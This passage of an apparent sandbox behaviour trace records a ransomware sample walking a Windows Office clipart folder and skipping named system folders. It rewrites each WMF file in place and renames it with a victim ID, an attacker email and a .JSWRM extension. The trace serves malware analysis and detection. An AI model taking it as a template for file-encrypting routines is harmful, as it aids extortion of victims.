lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281638.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.707] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11912) returned 1 [0088.708] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e80) returned 0x24d210 [0088.708] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2e80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2e80, lpOverlapped=0x0) returned 1 [0088.710] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.710] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2e80, lpOverlapped=0x0) returned 1 [0088.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.710] CloseHandle (hObject=0x314) returned 1 [0088.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0088.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0088.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0088.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0088.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0088.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0088.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.711] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281638.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281638.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281638.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0088.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0088.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.712] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30f2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0281640.WMF", cAlternateFileName="")) returned 1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2=".") returned 1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2="..") returned 1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2="...") returned 1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2="windows") returned -1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2="recovery") returned -1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2="perflogs") returned -1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2="documents and settings") returned 1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2="system volume information") returned -1 [0088.712] lstrcmpiW (lpString1="J0281640.WMF", lpString2="msocache") returned -1 [0088.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0088.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281640.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281640.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281640.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0088.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281640.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281640.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281640.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281640.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.713] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12530) returned 1 [0088.713] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30f0) returned 0x24d210 [0088.713] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x30f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x30f0, lpOverlapped=0x0) returned 1 [0088.716] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.716] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x30f0, lpOverlapped=0x0) returned 1 [0088.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.716] CloseHandle (hObject=0x314) returned 1 [0088.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0088.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0088.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0088.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0088.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0088.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281640.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281640.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0088.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.717] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c9e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0282126.WMF", cAlternateFileName="")) returned 1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2=".") returned 1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2="..") returned 1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2="...") returned 1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2="windows") returned -1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2="recovery") returned -1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2="perflogs") returned -1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2="documents and settings") returned 1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2="system volume information") returned -1 [0088.717] lstrcmpiW (lpString1="J0282126.WMF", lpString2="msocache") returned -1 [0088.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282126.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282126.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0282126.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282126.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282126.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0282126.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0088.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282126.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.718] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15518) returned 1 [0088.718] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3c90) returned 0x24d210 [0088.718] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3c90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3c90, lpOverlapped=0x0) returned 1 [0088.721] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.721] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3c90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3c90, lpOverlapped=0x0) returned 1 [0088.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.722] CloseHandle (hObject=0x314) returned 1 [0088.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0088.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0088.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0088.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0088.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0088.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.722] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282126.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282126.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0088.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0088.723] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8166, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0282928.WMF", cAlternateFileName="")) returned 1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2=".") returned 1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2="..") returned 1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2="...") returned 1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2="windows") returned -1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2="recovery") returned -1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2="perflogs") returned -1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2="documents and settings") returned 1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2="system volume information") returned -1 [0088.723] lstrcmpiW (lpString1="J0282928.WMF", lpString2="msocache") returned -1 [0088.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282928.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282928.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0282928.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0088.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282928.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282928.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0282928.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0088.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0088.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282928.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.724] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33126) returned 1 [0088.724] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8160) returned 0x24d210 [0088.725] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8160, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8160, lpOverlapped=0x0) returned 1 [0088.728] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.728] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8160, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8160, lpOverlapped=0x0) returned 1 [0088.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.729] CloseHandle (hObject=0x314) returned 1 [0088.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0088.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 